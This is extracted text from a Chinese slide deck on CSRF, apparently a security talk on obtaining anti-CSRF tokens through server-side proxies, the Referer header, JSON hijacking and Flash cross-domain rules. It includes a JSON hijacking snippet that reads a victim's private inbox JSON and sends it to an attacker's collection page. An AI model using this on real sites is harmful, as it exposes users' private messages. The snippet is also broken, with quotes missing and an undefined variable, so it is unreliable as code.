CSRF-苏醒的巨人.pptVIP

使用服务端代理 使用服务端代理技术： asp/服务端的XMLHTTP，php的file_get_contents等等。 无法获取页面内容中的唯一标识，只能获取url中的唯一标识： 使用referer来获取目标站点的url。 r = Request.ServerVariables(“HTTP_REFERER”)。 r可能为http://目标站点/space/user/?id=2343，其中2343就是唯一标识。 使用JSON Hijacking 使用JSON Hijacking技术： 目标站点使用了JSON数据传输用户私有数据。 该私有数据内包含我们需要的唯一标识等信息。 相关代码： script function hijack(o){ //use DOM method to get your data new Image().src=/JSONHiJack.asp?hi=+escape(data); }/script script src=/private_messages/inbox.json?callback=hijackcount=2/script 使用Flash 使用Flash ActionScript脚本： 目标站点下必须存在crossdomain.xml文件。 crossdomain.xml中的配置允许其他域的AS脚本进行跨域请求。 ?xml version=1